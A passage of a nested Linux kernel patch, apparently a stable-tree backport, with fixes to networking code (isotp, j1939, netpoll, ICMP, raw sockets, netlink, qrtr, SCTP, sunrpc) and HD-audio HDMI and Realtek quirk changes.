++static __poll_t isotp_poll(struct file *file, struct socket *sock, poll_table *wait)
++{
++	struct sock *sk = sock->sk;
++	struct isotp_sock *so = isotp_sk(sk);
++
++	__poll_t mask = datagram_poll(file, sock, wait);
++	poll_wait(file, &so->wait, wait);
++
++	/* Check for false positives due to TX state */
++	if ((mask & EPOLLWRNORM) && (so->tx.state != ISOTP_IDLE))
++		mask &= ~(EPOLLOUT | EPOLLWRNORM);
++
++	return mask;
++}
++
+ static int isotp_sock_no_ioctlcmd(struct socket *sock, unsigned int cmd,
+ 				  unsigned long arg)
+ {
+@@ -1623,7 +1645,7 @@ static const struct proto_ops isotp_ops = {
+ 	.socketpair = sock_no_socketpair,
+ 	.accept = sock_no_accept,
+ 	.getname = isotp_getname,
+-	.poll = datagram_poll,
++	.poll = isotp_poll,
+ 	.ioctl = isotp_sock_no_ioctlcmd,
+ 	.gettstamp = sock_gettstamp,
+ 	.listen = sock_no_listen,
+diff --git a/net/can/j1939/transport.c b/net/can/j1939/transport.c
+index 848b60c9ef79e..bd8ec24338324 100644
+--- a/net/can/j1939/transport.c
++++ b/net/can/j1939/transport.c
+@@ -604,7 +604,10 @@ sk_buff *j1939_tp_tx_dat_new(struct j1939_priv *priv,
+ 	/* reserve CAN header */
+ 	skb_reserve(skb, offsetof(struct can_frame, data));
+ 
+-	memcpy(skb->cb, re_skcb, sizeof(skb->cb));
++	/* skb->cb must be large enough to hold a j1939_sk_buff_cb structure */
++	BUILD_BUG_ON(sizeof(skb->cb) < sizeof(*re_skcb));
++
++	memcpy(skb->cb, re_skcb, sizeof(*re_skcb));
+ 	skcb = j1939_skb_to_cb(skb);
+ 	if (swap_src_dst)
+ 		j1939_skbcb_swap(skcb);
+diff --git a/net/core/netpoll.c b/net/core/netpoll.c
+index 9be762e1d0428..4ac8d0ad9f6fc 100644
+--- a/net/core/netpoll.c
++++ b/net/core/netpoll.c
+@@ -137,6 +137,20 @@ static void queue_process(struct work_struct *work)
+ 	}
+ }
+ 
++static int netif_local_xmit_active(struct net_device *dev)
++{
++	int i;
++
++	for (i = 0; i < dev->num_tx_queues; i++) {
++		struct netdev_queue *txq = netdev_get_tx_queue(dev, i);
++
++		if (READ_ONCE(txq->xmit_lock_owner) == smp_processor_id())
++			return 1;
++	}
++
++	return 0;
++}
++
+ static void poll_one_napi(struct napi_struct *napi)
+ {
+ 	int work;
+@@ -183,7 +197,10 @@ void netpoll_poll_dev(struct net_device *dev)
+ 	if (!ni || down_trylock(&ni->dev_lock))
+ 		return;
+ 
+-	if (!netif_running(dev)) {
++	/* Some drivers will take the same locks in poll and xmit,
++	 * we can't poll if local CPU is already in xmit.
++	 */
++	if (!netif_running(dev) || netif_local_xmit_active(dev)) {
+ 		up(&ni->dev_lock);
+ 		return;
+ 	}
+diff --git a/net/ethtool/linkmodes.c b/net/ethtool/linkmodes.c
+index 126e06c713a3a..2d91f2a8c7626 100644
+--- a/net/ethtool/linkmodes.c
++++ b/net/ethtool/linkmodes.c
+@@ -282,11 +282,12 @@ static int ethnl_update_linkmodes(struct genl_info *info, struct nlattr **tb,
+ 					    "lanes configuration not supported by device");
+ 			return -EOPNOTSUPP;
+ 		}
+-	} else if (!lsettings->autoneg) {
+-		/* If autoneg is off and lanes parameter is not passed from user,
+-		 * set the lanes parameter to 0.
++	} else if (!lsettings->autoneg && ksettings->lanes) {
++		/* If autoneg is off and lanes parameter is not passed from user but
++		 * it was defined previously then set the lanes parameter to 0.
+ 		 */
+ 		ksettings->lanes = 0;
++		*mod = true;
+ 	}
+ 
+ 	ret = ethnl_update_bitset(ksettings->link_modes.advertising,
+diff --git a/net/ipv4/icmp.c b/net/ipv4/icmp.c
+index d5d745c3e345b..2b09ef70752f9 100644
+--- a/net/ipv4/icmp.c
++++ b/net/ipv4/icmp.c
+@@ -746,6 +746,11 @@ void __icmp_send(struct sk_buff *skb_in, int type, int code, __be32 info,
+ 		room = 576;
+ 	room -= sizeof(struct iphdr) + icmp_param.replyopts.opt.opt.optlen;
+ 	room -= sizeof(struct icmphdr);
++	/* Guard against tiny mtu. We need to include at least one
++	 * IP network header for this message to make any sense.
++	 */
++	if (room <= (int)sizeof(struct iphdr))
++		goto ende;
+ 
+ 	icmp_param.data_len = skb_in->len - icmp_param.offset;
+ 	if (icmp_param.data_len > room)
+diff --git a/net/ipv4/ping.c b/net/ipv4/ping.c
+index 409ec2a1f95b0..5178a3f3cb537 100644
+--- a/net/ipv4/ping.c
++++ b/net/ipv4/ping.c
+@@ -1089,13 +1089,13 @@ static struct sock *ping_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *ping_seq_start(struct seq_file *seq, loff_t *pos, sa_family_t family)
+-	__acquires(RCU)
++	__acquires(ping_table.lock)
+ {
+ 	struct ping_iter_state *state = seq->private;
+ 	state->bucket = 0;
+ 	state->family = family;
+ 
+-	rcu_read_lock();
++	spin_lock(&ping_table.lock);
+ 
+ 	return *pos ? ping_get_idx(seq, *pos-1) : SEQ_START_TOKEN;
+ }
+@@ -1121,9 +1121,9 @@ void *ping_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(ping_seq_next);
+ 
+ void ping_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(ping_table.lock)
+ {
+-	rcu_read_unlock();
++	spin_unlock(&ping_table.lock);
+ }
+ EXPORT_SYMBOL_GPL(ping_seq_stop);
+ 
+diff --git a/net/ipv4/raw.c b/net/ipv4/raw.c
+index 006c1f0ed8b47..af03aa8a8e513 100644
+--- a/net/ipv4/raw.c
++++ b/net/ipv4/raw.c
+@@ -91,12 +91,12 @@ EXPORT_SYMBOL_GPL(raw_v4_hashinfo);
+ int raw_hash_sk(struct sock *sk)
+ {
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+-	struct hlist_nulls_head *hlist;
++	struct hlist_head *hlist;
+ 
+-	hlist = &h->ht[inet_sk(sk)->inet_num & (RAW_HTABLE_SIZE - 1)];
++	hlist = &h->ht[raw_hashfunc(sock_net(sk), inet_sk(sk)->inet_num)];
+ 
+ 	spin_lock(&h->lock);
+-	__sk_nulls_add_node_rcu(sk, hlist);
++	sk_add_node_rcu(sk, hlist);
+ 	sock_set_flag(sk, SOCK_RCU_FREE);
+ 	spin_unlock(&h->lock);
+ 	sock_prot_inuse_add(sock_net(sk), sk->sk_prot, 1);
+@@ -110,7 +110,7 @@ void raw_unhash_sk(struct sock *sk)
+ 	struct raw_hashinfo *h = sk->sk_prot->h.raw_hash;
+ 
+ 	spin_lock(&h->lock);
+-	if (__sk_nulls_del_node_init_rcu(sk))
++	if (sk_del_node_init_rcu(sk))
+ 		sock_prot_inuse_add(sock_net(sk), sk->sk_prot, -1);
+ 	spin_unlock(&h->lock);
+ }
+@@ -160,19 +160,18 @@ static int icmp_filter(const struct sock *sk, const struct sk_buff *skb)
+  * RFC 1122: SHOULD pass TOS value up to the transport layer.
+  * -> It does. And not only TOS, but all IP header.
+  */
+-static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
++static int raw_v4_input(struct net *net, struct sk_buff *skb,
++			const struct iphdr *iph, int hash)
+ {
+-	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	int dif = inet_iif(skb);
+ 	int delivered = 0;
+ 	struct sock *sk;
+ 
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->saddr, iph->daddr, dif, sdif))
+ 			continue;
+@@ -193,9 +192,10 @@ static int raw_v4_input(struct sk_buff *skb, const struct iphdr *iph, int hash)
+ 
+ int raw_local_deliver(struct sk_buff *skb, int protocol)
+ {
+-	int hash = protocol & (RAW_HTABLE_SIZE - 1);
++	struct net *net = dev_net(skb->dev);
+ 
+-	return raw_v4_input(skb, ip_hdr(skb), hash);
++	return raw_v4_input(net, skb, ip_hdr(skb),
++			    raw_hashfunc(net, protocol));
+ }
+ 
+ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+@@ -263,19 +263,18 @@ static void raw_err(struct sock *sk, struct sk_buff *skb, u32 info)
+ void raw_icmp_error(struct sk_buff *skb, int protocol, u32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int dif = skb->dev->ifindex;
+ 	int sdif = inet_sdif(skb);
++	struct hlist_head *hlist;
+ 	const struct iphdr *iph;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = protocol & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, protocol);
+ 	hlist = &raw_v4_hashinfo.ht[hash];
+ 
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		iph = (const struct iphdr *)skb->data;
+ 		if (!raw_v4_match(net, sk, iph->protocol,
+ 				  iph->daddr, iph->saddr, dif, sdif))
+@@ -947,14 +946,13 @@ static struct sock *raw_get_first(struct seq_file *seq, int bucket)
+ {
+ 	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 
+ 	for (state->bucket = bucket; state->bucket < RAW_HTABLE_SIZE;
+ 			++state->bucket) {
+ 		hlist = &h->ht[state->bucket];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each(sk, hlist) {
+ 			if (sock_net(sk) == seq_file_net(seq))
+ 				return sk;
+ 		}
+@@ -967,7 +965,7 @@ static struct sock *raw_get_next(struct seq_file *seq, struct sock *sk)
+ 	struct raw_iter_state *state = raw_seq_private(seq);
+ 
+ 	do {
+-		sk = sk_nulls_next(sk);
++		sk = sk_next(sk);
+ 	} while (sk && sock_net(sk) != seq_file_net(seq));
+ 
+ 	if (!sk)
+@@ -986,9 +984,12 @@ static struct sock *raw_get_idx(struct seq_file *seq, loff_t pos)
+ }
+ 
+ void *raw_seq_start(struct seq_file *seq, loff_t *pos)
+-	__acquires(RCU)
++	__acquires(&h->lock)
+ {
+-	rcu_read_lock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_lock(&h->lock);
++
+ 	return *pos ? raw_get_idx(seq, *pos - 1) : SEQ_START_TOKEN;
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_start);
+@@ -1007,9 +1008,11 @@ void *raw_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ EXPORT_SYMBOL_GPL(raw_seq_next);
+ 
+ void raw_seq_stop(struct seq_file *seq, void *v)
+-	__releases(RCU)
++	__releases(&h->lock)
+ {
+-	rcu_read_unlock();
++	struct raw_hashinfo *h = pde_data(file_inode(seq->file));
++
++	spin_unlock(&h->lock);
+ }
+ EXPORT_SYMBOL_GPL(raw_seq_stop);
+ 
+diff --git a/net/ipv4/raw_diag.c b/net/ipv4/raw_diag.c
+index 999321834b94a..da3591a66a169 100644
+--- a/net/ipv4/raw_diag.c
++++ b/net/ipv4/raw_diag.c
+@@ -57,8 +57,7 @@ static bool raw_lookup(struct net *net, struct sock *sk,
+ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2 *r)
+ {
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int slot;
+ 
+@@ -68,7 +67,7 @@ static struct sock *raw_sock_get(struct net *net, const struct inet_diag_req_v2
+ 	rcu_read_lock();
+ 	for (slot = 0; slot < RAW_HTABLE_SIZE; slot++) {
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			if (raw_lookup(net, sk, r)) {
+ 				/*
+ 				 * Grab it and keep until we fill
+@@ -142,9 +141,8 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 	struct raw_hashinfo *hashinfo = raw_get_hashinfo(r);
+ 	struct net *net = sock_net(skb->sk);
+ 	struct inet_diag_dump_data *cb_data;
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	int num, s_num, slot, s_slot;
++	struct hlist_head *hlist;
+ 	struct sock *sk = NULL;
+ 	struct nlattr *bc;
+ 
+@@ -161,7 +159,7 @@ static void raw_diag_dump(struct sk_buff *skb, struct netlink_callback *cb,
+ 		num = 0;
+ 
+ 		hlist = &hashinfo->ht[slot];
+-		sk_nulls_for_each(sk, hnode, hlist) {
++		sk_for_each_rcu(sk, hlist) {
+ 			struct inet_sock *inet = inet_sk(sk);
+ 
+ 			if (!net_eq(sock_net(sk), net))
+diff --git a/net/ipv6/ip6_output.c b/net/ipv6/ip6_output.c
+index c314fdde0097c..95a55c6630add 100644
+--- a/net/ipv6/ip6_output.c
++++ b/net/ipv6/ip6_output.c
+@@ -1965,8 +1965,13 @@ struct sk_buff *__ip6_make_skb(struct sock *sk,
+ 	IP6_UPD_PO_STATS(net, rt->rt6i_idev, IPSTATS_MIB_OUT, skb->len);
+ 	if (proto == IPPROTO_ICMPV6) {
+ 		struct inet6_dev *idev = ip6_dst_idev(skb_dst(skb));
++		u8 icmp6_type;
+ 
+-		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_hdr(skb)->icmp6_type);
++		if (sk->sk_socket->type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp6_type = fl6->fl6_icmp_type;
++		else
++			icmp6_type = icmp6_hdr(skb)->icmp6_type;
++		ICMP6MSGOUT_INC_STATS(net, idev, icmp6_type);
+ 		ICMP6_INC_STATS(net, idev, ICMP6_MIB_OUTMSGS);
+ 	}
+ 
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 8ffeac7456567..9ee1506e23ab1 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -141,10 +141,9 @@ EXPORT_SYMBOL(rawv6_mh_filter_unregister);
+ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
+ 	const struct in6_addr *saddr;
+ 	const struct in6_addr *daddr;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	bool delivered = false;
+ 	__u8 hash;
+@@ -152,10 +151,10 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 	saddr = &ipv6_hdr(skb)->saddr;
+ 	daddr = saddr + 1;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		int filtered;
+ 
+ 		if (!raw_v6_match(net, sk, nexthdr, daddr, saddr,
+@@ -333,15 +332,14 @@ void raw6_icmp_error(struct sk_buff *skb, int nexthdr,
+ 		u8 type, u8 code, int inner_offset, __be32 info)
+ {
+ 	struct net *net = dev_net(skb->dev);
+-	struct hlist_nulls_head *hlist;
+-	struct hlist_nulls_node *hnode;
++	struct hlist_head *hlist;
+ 	struct sock *sk;
+ 	int hash;
+ 
+-	hash = nexthdr & (RAW_HTABLE_SIZE - 1);
++	hash = raw_hashfunc(net, nexthdr);
+ 	hlist = &raw_v6_hashinfo.ht[hash];
+ 	rcu_read_lock();
+-	sk_nulls_for_each(sk, hnode, hlist) {
++	sk_for_each_rcu(sk, hlist) {
+ 		/* Note: ipv6_hdr(skb) != skb->data */
+ 		const struct ipv6hdr *ip6h = (const struct ipv6hdr *)skb->data;
+ 
+diff --git a/net/l2tp/l2tp_ip.c b/net/l2tp/l2tp_ip.c
+index 4db5a554bdbd9..41a74fc84ca13 100644
+--- a/net/l2tp/l2tp_ip.c
++++ b/net/l2tp/l2tp_ip.c
+@@ -677,8 +677,8 @@ MODULE_AUTHOR("James Chapman <jchapman@katalix.com>");
+ MODULE_DESCRIPTION("L2TP over IP");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET, 115);
+diff --git a/net/l2tp/l2tp_ip6.c b/net/l2tp/l2tp_ip6.c
+index 9dbd801ddb98c..9db7f4f5a4414 100644
+--- a/net/l2tp/l2tp_ip6.c
++++ b/net/l2tp/l2tp_ip6.c
+@@ -808,8 +808,8 @@ MODULE_AUTHOR("Chris Elston <celston@katalix.com>");
+ MODULE_DESCRIPTION("L2TP IP encapsulation for IPv6");
+ MODULE_VERSION("1.0");
+ 
+-/* Use the value of SOCK_DGRAM (2) directory, because __stringify doesn't like
+- * enums
++/* Use the values of SOCK_DGRAM (2) as type and IPPROTO_L2TP (115) as protocol,
++ * because __stringify doesn't like enums
+  */
+-MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 2, IPPROTO_L2TP);
+-MODULE_ALIAS_NET_PF_PROTO(PF_INET6, IPPROTO_L2TP);
++MODULE_ALIAS_NET_PF_PROTO_TYPE(PF_INET6, 115, 2);
++MODULE_ALIAS_NET_PF_PROTO(PF_INET6, 115);
+diff --git a/net/mac80211/sta_info.c b/net/mac80211/sta_info.c
+index 3603cbc167570..30efa26f977f6 100644
+--- a/net/mac80211/sta_info.c
++++ b/net/mac80211/sta_info.c
+@@ -1242,7 +1242,8 @@ static int __must_check __sta_info_destroy_part1(struct sta_info *sta)
+ 	list_del_rcu(&sta->list);
+ 	sta->removed = true;
+ 
+-	drv_sta_pre_rcu_remove(local, sta->sdata, sta);
++	if (sta->uploaded)
++		drv_sta_pre_rcu_remove(local, sta->sdata, sta);
+ 
+ 	if (sdata->vif.type == NL80211_IFTYPE_AP_VLAN &&
+ 	    rcu_access_pointer(sdata->u.vlan.sta) == sta)
+diff --git a/net/mac80211/util.c b/net/mac80211/util.c
+index ed53c51bbc321..0785d9393e718 100644
+--- a/net/mac80211/util.c
++++ b/net/mac80211/util.c
+@@ -4785,7 +4785,7 @@ u8 ieee80211_ie_len_eht_cap(struct ieee80211_sub_if_data *sdata, u8 iftype)
+ 				       &eht_cap->eht_cap_elem,
+ 				       is_ap);
+ 	return 2 + 1 +
+-	       sizeof(he_cap->he_cap_elem) + n +
++	       sizeof(eht_cap->eht_cap_elem) + n +
+ 	       ieee80211_eht_ppe_size(eht_cap->eht_ppe_thres[0],
+ 				      eht_cap->eht_cap_elem.phy_cap_info);
+ 	return 0;
+diff --git a/net/netlink/af_netlink.c b/net/netlink/af_netlink.c
+index e506712967918..99622c64081c4 100644
+--- a/net/netlink/af_netlink.c
++++ b/net/netlink/af_netlink.c
+@@ -1941,7 +1941,7 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ 	struct scm_cookie scm;
+ 	struct sock *sk = sock->sk;
+ 	struct netlink_sock *nlk = nlk_sk(sk);
+-	size_t copied;
++	size_t copied, max_recvmsg_len;
+ 	struct sk_buff *skb, *data_skb;
+ 	int err, ret;
+ 
+@@ -1974,9 +1974,10 @@ static int netlink_recvmsg(struct socket *sock, struct msghdr *msg, size_t len,
+ #endif
+ 
+ 	/* Record the max length of recvmsg() calls for future allocations */
+-	nlk->max_recvmsg_len = max(nlk->max_recvmsg_len, len);
+-	nlk->max_recvmsg_len = min_t(size_t, nlk->max_recvmsg_len,
+-				     SKB_WITH_OVERHEAD(32768));
++	max_recvmsg_len = max(READ_ONCE(nlk->max_recvmsg_len), len);
++	max_recvmsg_len = min_t(size_t, max_recvmsg_len,
++				SKB_WITH_OVERHEAD(32768));
++	WRITE_ONCE(nlk->max_recvmsg_len, max_recvmsg_len);
+ 
+ 	copied = data_skb->len;
+ 	if (len < copied) {
+@@ -2225,6 +2226,7 @@ static int netlink_dump(struct sock *sk)
+ 	struct netlink_ext_ack extack = {};
+ 	struct netlink_callback *cb;
+ 	struct sk_buff *skb = NULL;
++	size_t max_recvmsg_len;
+ 	struct module *module;
+ 	int err = -ENOBUFS;
+ 	int alloc_min_size;
+@@ -2247,8 +2249,9 @@ static int netlink_dump(struct sock *sk)
+ 	cb = &nlk->cb;
+ 	alloc_min_size = max_t(int, cb->min_dump_alloc, NLMSG_GOODSIZE);
+ 
+-	if (alloc_min_size < nlk->max_recvmsg_len) {
+-		alloc_size = nlk->max_recvmsg_len;
++	max_recvmsg_len = READ_ONCE(nlk->max_recvmsg_len);
++	if (alloc_min_size < max_recvmsg_len) {
++		alloc_size = max_recvmsg_len;
+ 		skb = alloc_skb(alloc_size,
+ 				(GFP_KERNEL & ~__GFP_DIRECT_RECLAIM) |
+ 				__GFP_NOWARN | __GFP_NORETRY);
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 5c2fb992803b7..3a70255c8d02f 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -393,10 +393,12 @@ static struct qrtr_node *qrtr_node_lookup(unsigned int nid)
+ 	struct qrtr_node *node;
+ 	unsigned long flags;
+ 
++	mutex_lock(&qrtr_node_lock);
+ 	spin_lock_irqsave(&qrtr_nodes_lock, flags);
+ 	node = radix_tree_lookup(&qrtr_nodes, nid);
+ 	node = qrtr_node_acquire(node);
+ 	spin_unlock_irqrestore(&qrtr_nodes_lock, flags);
++	mutex_unlock(&qrtr_node_lock);
+ 
+ 	return node;
+ }
+diff --git a/net/qrtr/ns.c b/net/qrtr/ns.c
+index e595079c2cafe..3e40a1ba48f79 100644
+--- a/net/qrtr/ns.c
++++ b/net/qrtr/ns.c
+@@ -273,7 +273,7 @@ err:
+ 	return NULL;
+ }
+ 
+-static int server_del(struct qrtr_node *node, unsigned int port)
++static int server_del(struct qrtr_node *node, unsigned int port, bool bcast)
+ {
+ 	struct qrtr_lookup *lookup;
+ 	struct qrtr_server *srv;
+@@ -286,7 +286,7 @@ static int server_del(struct qrtr_node *node, unsigned int port)
+ 	radix_tree_delete(&node->servers, port);
+ 
+ 	/* Broadcast the removal of local servers */
+-	if (srv->node == qrtr_ns.local_node)
++	if (srv->node == qrtr_ns.local_node && bcast)
+ 		service_announce_del(&qrtr_ns.bcast_sq, srv);
+ 
+ 	/* Announce the service's disappearance to observers */
+@@ -372,7 +372,7 @@ static int ctrl_cmd_bye(struct sockaddr_qrtr *from)
+ 		}
+ 		slot = radix_tree_iter_resume(slot, &iter);
+ 		rcu_read_unlock();
+-		server_del(node, srv->port);
++		server_del(node, srv->port, true);
+ 		rcu_read_lock();
+ 	}
+ 	rcu_read_unlock();
+@@ -458,10 +458,13 @@ static int ctrl_cmd_del_client(struct sockaddr_qrtr *from,
+ 		kfree(lookup);
+ 	}
+ 
+-	/* Remove the server belonging to this port */
++	/* Remove the server belonging to this port but don't broadcast
++	 * DEL_SERVER. Neighbours would've already removed the server belonging
++	 * to this port due to the DEL_CLIENT broadcast from qrtr_port_remove().
++	 */
+ 	node = node_get(node_id);
+ 	if (node)
+-		server_del(node, port);
++		server_del(node, port, false);
+ 
+ 	/* Advertise the removal of this client to all local servers */
+ 	local_node = node_get(qrtr_ns.local_node);
+@@ -566,7 +569,7 @@ static int ctrl_cmd_del_server(struct sockaddr_qrtr *from,
+ 	if (!node)
+ 		return -ENOENT;
+ 
+-	return server_del(node, port);
++	return server_del(node, port, true);
+ }
+ 
+ static int ctrl_cmd_new_lookup(struct sockaddr_qrtr *from,
+diff --git a/net/sctp/socket.c b/net/sctp/socket.c
+index 83628c347744b..507b2ad5ef7c7 100644
+--- a/net/sctp/socket.c
++++ b/net/sctp/socket.c
+@@ -1829,6 +1829,10 @@ static int sctp_sendmsg_to_asoc(struct sctp_association *asoc,
+ 		err = sctp_wait_for_sndbuf(asoc, &timeo, msg_len);
+ 		if (err)
+ 			goto err;
++		if (unlikely(sinfo->sinfo_stream >= asoc->stream.outcnt)) {
++			err = -EINVAL;
++			goto err;
++		}
+ 	}
+ 
+ 	if (sctp_state(asoc, CLOSED)) {
+diff --git a/net/sunrpc/svcauth_unix.c b/net/sunrpc/svcauth_unix.c
+index b1efc34db6ed8..609ade4fb49ed 100644
+--- a/net/sunrpc/svcauth_unix.c
++++ b/net/sunrpc/svcauth_unix.c
+@@ -416,14 +416,23 @@ static int unix_gid_hash(kuid_t uid)
+ 	return hash_long(from_kuid(&init_user_ns, uid), GID_HASHBITS);
+ }
+ 
+-static void unix_gid_put(struct kref *kref)
++static void unix_gid_free(struct rcu_head *rcu)
+ {
+-	struct cache_head *item = container_of(kref, struct cache_head, ref);
+-	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++	struct unix_gid *ug = container_of(rcu, struct unix_gid, rcu);
++	struct cache_head *item = &ug->h;
++
+ 	if (test_bit(CACHE_VALID, &item->flags) &&
+ 	    !test_bit(CACHE_NEGATIVE, &item->flags))
+ 		put_group_info(ug->gi);
+-	kfree_rcu(ug, rcu);
++	kfree(ug);
++}
++
++static void unix_gid_put(struct kref *kref)
++{
++	struct cache_head *item = container_of(kref, struct cache_head, ref);
++	struct unix_gid *ug = container_of(item, struct unix_gid, h);
++
++	call_rcu(&ug->rcu, unix_gid_free);
+ }
+ 
+ static int unix_gid_match(struct cache_head *corig, struct cache_head *cnew)
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 9ea633fe93393..4ffa3a59f419f 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -81,6 +81,7 @@ struct hdmi_spec_per_pin {
+ 	struct delayed_work work;
+ 	struct hdmi_pcm *pcm; /* pointer to spec->pcm_rec[n] dynamically*/
+ 	int pcm_idx; /* which pcm is attached. -1 means no pcm is attached */
++	int prev_pcm_idx; /* previously assigned pcm index */
+ 	int repoll_count;
+ 	bool setup; /* the stream has been set up by prepare callback */
+ 	bool silent_stream;
+@@ -1380,9 +1381,17 @@ static void hdmi_attach_hda_pcm(struct hdmi_spec *spec,
+ 	/* pcm already be attached to the pin */
+ 	if (per_pin->pcm)
+ 		return;
++	/* try the previously used slot at first */
++	idx = per_pin->prev_pcm_idx;
++	if (idx >= 0) {
++		if (!test_bit(idx, &spec->pcm_bitmap))
++			goto found;
++		per_pin->prev_pcm_idx = -1; /* no longer valid, clear it */
++	}
+ 	idx = hdmi_find_pcm_slot(spec, per_pin);
+ 	if (idx == -EBUSY)
+ 		return;
++ found:
+ 	per_pin->pcm_idx = idx;
+ 	per_pin->pcm = get_hdmi_pcm(spec, idx);
+ 	set_bit(idx, &spec->pcm_bitmap);
+@@ -1398,6 +1407,7 @@ static void hdmi_detach_hda_pcm(struct hdmi_spec *spec,
+ 		return;
+ 	idx = per_pin->pcm_idx;
+ 	per_pin->pcm_idx = -1;
++	per_pin->prev_pcm_idx = idx; /* remember the previous index */
+ 	per_pin->pcm = NULL;
+ 	if (idx >= 0 && idx < spec->pcm_used)
+ 		clear_bit(idx, &spec->pcm_bitmap);
+@@ -1924,6 +1934,7 @@ static int hdmi_add_pin(struct hda_codec *codec, hda_nid_t pin_nid)
+ 
+ 		per_pin->pcm = NULL;
+ 		per_pin->pcm_idx = -1;
++		per_pin->prev_pcm_idx = -1;
+ 		per_pin->pin_nid = pin_nid;
+ 		per_pin->pin_nid_idx = spec->num_nids;
+ 		per_pin->dev_id = i;
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 070150bbd3559..50b8573b52066 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -2624,6 +2624,7 @@ static const struct snd_pci_quirk alc882_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1462, 0xda57, "MSI Z270-Gaming", ALC1220_FIXUP_GB_DUAL_CODECS),
+ 	SND_PCI_QUIRK_VENDOR(0x1462, "MSI", ALC882_FIXUP_GPIO3),
+ 	SND_PCI_QUIRK(0x147b, 0x107a, "Abit AW9D-MAX", ALC882_FIXUP_ABIT_AW9D_MAX),
++	SND_PCI_QUIRK(0x1558, 0x3702, "Clevo X370SN[VW]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x50d3, "Clevo PC50[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d1, "Clevo PB51[ER][CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+ 	SND_PCI_QUIRK(0x1558, 0x65d2, "Clevo PB51R[CDF]", ALC1220_FIXUP_CLEVO_PB51ED_PINS),
+@@ -9442,6 +9443,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x103c, 0x8b47, "HP", ALC245_FIXUP_CS35L41_SPI_2_HP_GPIO_LED),
